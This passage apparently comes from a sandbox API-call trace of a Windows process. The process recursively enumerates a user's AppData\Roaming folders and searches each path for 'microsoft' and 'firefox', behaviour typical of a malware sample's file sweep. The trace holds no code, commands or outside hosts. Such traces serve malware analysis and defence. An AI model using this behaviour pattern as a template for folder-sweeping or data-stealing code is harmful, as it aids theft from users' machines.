pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts" [0083.456] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts") returned 0 [0083.456] GetNamedSecurityInfoW () returned 0x0 [0083.456] LocalFree (hMem=0x571fe8) returned 0x0 [0083.456] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts", lpSrch="microsoft") returned 0x0 [0083.456] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts", lpSrch="firefox") returned 0x0 [0083.456] PathCombineW (in: pszDest=0x18d0b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*" [0083.456] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*", lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0x586c20 [0083.456] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.456] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.456] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.456] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0 [0083.456] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.456] Sleep (dwMilliseconds=0x0) [0083.456] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.456] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="Security" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security" [0083.456] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security") returned 0 [0083.456] GetNamedSecurityInfoW () returned 0x0 [0083.456] LocalFree (hMem=0x572028) returned 0x0 [0083.456] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", lpSrch="microsoft") returned 0x0 [0083.456] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", lpSrch="firefox") returned 0x0 [0083.456] PathCombineW (in: pszDest=0x18d0b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*" [0083.457] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*", lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0x586c20 [0083.457] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.457] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.457] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.457] PathCombineW (in: pszDest=0x18d0b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", pszFile="CRLCache" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache" [0083.457] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache") returned 0 [0083.457] GetNamedSecurityInfoW () returned 0x0 [0083.457] LocalFree (hMem=0x571fe8) returned 0x0 [0083.457] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache", lpSrch="microsoft") returned 0x0 [0083.457] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache", lpSrch="firefox") returned 0x0 [0083.457] PathCombineW (in: pszDest=0x18cc40, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*" [0083.457] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*", lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 0x586c60 [0083.457] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 1 [0083.457] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 1 [0083.457] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 1 [0083.457] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 0 [0083.457] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.457] Sleep (dwMilliseconds=0x0) [0083.457] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0 [0083.457] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.457] Sleep (dwMilliseconds=0x0) [0083.457] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0 [0083.457] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.457] Sleep (dwMilliseconds=0x0) [0083.457] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.457] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.457] Sleep (dwMilliseconds=0x0) [0083.458] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.458] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Flash Player" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player" [0083.458] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player") returned 0 [0083.458] GetNamedSecurityInfoW () returned 0x0 [0083.458] LocalFree (hMem=0x572028) returned 0x0 [0083.458] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player", lpSrch="microsoft") returned 0x0 [0083.458] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player", lpSrch="firefox") returned 0x0 [0083.458] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\*" [0083.458] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586ba0 [0083.458] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.458] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.458] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="AssetCache" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache" [0083.458] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache") returned 1 [0083.458] GetNamedSecurityInfoW () returned 0x0 [0083.458] LocalFree (hMem=0x571fe8) returned 0x0 [0083.458] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", lpSrch="microsoft") returned 0x0 [0083.458] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", lpSrch="firefox") returned 0x0 [0083.458] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*" [0083.458] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*", lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0x586be0 [0083.458] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.458] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0 [0083.459] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.459] Sleep (dwMilliseconds=0x0) [0083.459] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.459] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.459] Sleep (dwMilliseconds=0x0) [0083.459] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.459] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Headlights" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights" [0083.459] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights") returned 1 [0083.459] GetNamedSecurityInfoW () returned 0x0 [0083.459] LocalFree (hMem=0x572028) returned 0x0 [0083.459] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights", lpSrch="microsoft") returned 0x0 [0083.459] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights", lpSrch="firefox") returned 0x0 [0083.459] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights\\*" [0083.459] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586ba0 [0083.459] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.459] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.459] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.459] Sleep (dwMilliseconds=0x0) [0083.459] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.459] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Linguistics" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics" [0083.459] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics") returned 0 [0083.459] GetNamedSecurityInfoW () returned 0x0 [0083.460] LocalFree (hMem=0x571fe8) returned 0x0 [0083.460] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics", lpSrch="microsoft") returned 0x0 [0083.460] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics", lpSrch="firefox") returned 0x0 [0083.460] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\*" [0083.460] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586ba0 [0083.460] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.460] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.460] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics", pszFile="Dictionaries" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries" [0083.460] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries") returned 1 [0083.460] GetNamedSecurityInfoW () returned 0x0 [0083.460] LocalFree (hMem=0x572028) returned 0x0 [0083.460] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries", lpSrch="microsoft") returned 0x0 [0083.460] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries", lpSrch="firefox") returned 0x0 [0083.460] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*" [0083.460] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*", lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0x586be0 [0083.460] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.460] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0 [0083.460] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.460] Sleep (dwMilliseconds=0x0) [0083.460] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.460] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.460] Sleep (dwMilliseconds=0x0) [0083.460] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.460] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="LogTransport2" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2" [0083.461] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2") returned 1 [0083.461] GetNamedSecurityInfoW () returned 0x0 [0083.461] LocalFree (hMem=0x571fe8) returned 0x0 [0083.461] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2", lpSrch="microsoft") returned 0x0 [0083.461] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2", lpSrch="firefox") returned 0x0 [0083.461] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2\\*" [0083.461] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586ba0 [0083.461] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.461] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.461] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.461] Sleep (dwMilliseconds=0x0) [0083.461] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0 [0083.461] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.461] Sleep (dwMilliseconds=0x0) [0083.461] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.461] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.461] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.461] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.461] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.461] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.461] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.461] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.461] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.461] PathCombineW (in: pszDest=0x18e298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Identities" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities" [0083.461] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities") returned 0 [0083.461] GetNamedSecurityInfoW () returned 0x0 [0083.462] LocalFree (hMem=0x572028) returned 0x0 [0083.462] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities", lpSrch="microsoft") returned 0x0 [0083.462] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities", lpSrch="firefox") returned 0x0 [0083.462] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\*" [0083.462] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0x586b60 [0083.462] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.462] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.462] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities", pszFile="{31810C36-5D23-4CCE-A3B4-316DED195C38}" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}" [0083.462] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned 1 [0083.462] GetNamedSecurityInfoW () returned 0x0 [0083.462] LocalFree (hMem=0x571fe8) returned 0x0 [0083.462] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpSrch="microsoft") returned 0x0 [0083.462] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpSrch="firefox") returned 0x0 [0083.462] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*" [0083.462] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586ba0 [0083.462] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.462] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.462] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.462] Sleep (dwMilliseconds=0x0) [0083.462] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0 [0083.462] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.462] Sleep (dwMilliseconds=0x0) [0083.462] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.463] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.463] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.463] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.463] PathCombineW (in: pszDest=0x18e298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia" [0083.463] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia") returned 0 [0083.463] GetNamedSecurityInfoW () returned 0x0 [0083.463] LocalFree (hMem=0x572028) returned 0x0 [0083.463] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia", lpSrch="microsoft") returned 0x0 [0083.463] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia", lpSrch="firefox") returned 0x0 [0083.463] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\*" [0083.463] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\*", lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0x586b60 [0083.463] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.463] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.463] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia", pszFile="Flash Player" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player" [0083.463] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player") returned 0 [0083.463] GetNamedSecurityInfoW () returned 0x0 [0083.463] LocalFree (hMem=0x571fe8) returned 0x0 [0083.463] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player", lpSrch="microsoft") returned 0x0 [0083.463] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player", lpSrch="firefox") returned 0x0 [0083.463] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\*" [0083.463] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586ba0 [0083.463] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.463] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.464] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player", pszFile="macromedia.com" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com" [0083.464] PathIsDirectoryEmptyW 